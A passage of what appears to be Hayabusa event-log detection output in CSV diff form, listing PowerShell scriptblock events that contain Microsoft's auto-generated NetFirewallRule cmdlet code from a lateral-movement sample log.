$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuild",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"er.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdl",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"er.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"etization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' -Alias '*' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 